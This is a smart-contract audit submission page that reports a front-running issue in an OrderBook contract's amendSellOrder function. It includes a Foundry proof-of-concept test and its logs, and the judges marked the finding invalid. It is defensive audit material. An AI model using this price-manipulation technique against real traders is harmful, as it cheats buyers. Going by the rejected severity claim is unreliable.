OrderBook
First Flight #43
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Impact: high
Likelihood: high
Invalid

H-05 Seller Front-running with `amendSellOrder` leads to unfair trading for buyers

0x996

Root + Impact

Description

Due to the lack of a modification interval in amendSellOrder, sellers can front-run by amending the sell order, increasing the price or reducing the amount before the order is purchased. This leads to unfair trading for buyers.

function amendSellOrder(
uint256 _orderId,
uint256 _newAmountToSell,
uint256 _newPriceInUSDC,
uint256 _newDeadlineDuration
) public {
// Update order details
order.amountToSell = _newAmountToSell;
order.priceInUSDC = _newPriceInUSDC;
order.deadlineTimestamp = newDeadlineTimestamp;
}

Risk

Likelihood:

  • Reason 1: The seller can suddenly increase _newPriceInUSDC before the order is purchased.

Impact:

  • Impact 1: The buyer ends up paying more in protocol fees (protocolFee) and the actual payment (sellerReceives).

Proof of Concept

A malicious user can front-run amendSellOrder by maliciously increasing the PriceInUSDC. This increase will also increase the protocolFee and sellerReceives, causing the buyer to pay higher fees than originally intended.

function test_front_run() public {
// alice creates sell order for wbtc
vm.startPrank(alice);
wbtc.approve(address(book), 2e8);
uint256 aliceId = book.createSellOrder(address(wbtc), 2e8, 1e6, 3 days);
string memory aliceOrderDetails_1 = book.getOrderDetailsString(aliceId);
console2.log(aliceOrderDetails_1);
vm.stopPrank();
vm.warp(block.timestamp + 2 days);
vm.prank(alice);
book.amendSellOrder(aliceId, 1.75e8, 175_000e6, 3 days);
string memory aliceOrderDetails_2 = book.getOrderDetailsString(aliceId);
console2.log(aliceOrderDetails_2);
vm.startPrank(dan);
usdc.approve(address(book), 200_000e6);
book.buyOrder(aliceId); // dan buys alice wbtc order
string memory aliceOrderDetails_3 = book.getOrderDetailsString(aliceId);
console2.log(aliceOrderDetails_3);
}

Output

  1. The buyer originally only needed to pay protocolFee 30000 and sellerReceives 970000.

  2. Now, the buyer needs to pay much higher fees: protocolFee 5250000000 and sellerReceives 169750000000.

[PASS] test_front_run() (gas: 432069)
Logs:
Order ID: 1
Seller: 0xaf6db259343d020e372f4ab69cad536aaf79d0ac
Selling: 200000000 wBTC
Asking Price: 1000000 USDC
Deadline Timestamp: 259201
Status: Active
Order ID: 1
Seller: 0xaf6db259343d020e372f4ab69cad536aaf79d0ac
Selling: 175000000 wBTC
Asking Price: 175000000000 USDC
Deadline Timestamp: 432001
Status: Active
@> protocolFee 5250000000
@> sellerReceives 169750000000
BuyOrder totalFees: 5250000000
Order ID: 1
Seller: 0xaf6db259343d020e372f4ab69cad536aaf79d0ac
Selling: 175000000 wBTC
Asking Price: 175000000000 USDC
Deadline Timestamp: 432001
Status: Inactive (Filled/Cancelled)

Recommended Mitigation

Add a modification time interval to amendSellOrder so that the sell order cannot be amended before a trade is completed.

Updates

Lead Judging Commences

yeahchibyke Lead Judge
10 months ago
yeahchibyke Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity

Appeal created

0x996 Submitter
10 months ago
yeahchibyke Lead Judge
10 months ago
0x996 Submitter
10 months ago
yeahchibyke Lead Judge
10 months ago
0x996 Submitter
10 months ago
yeahchibyke Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!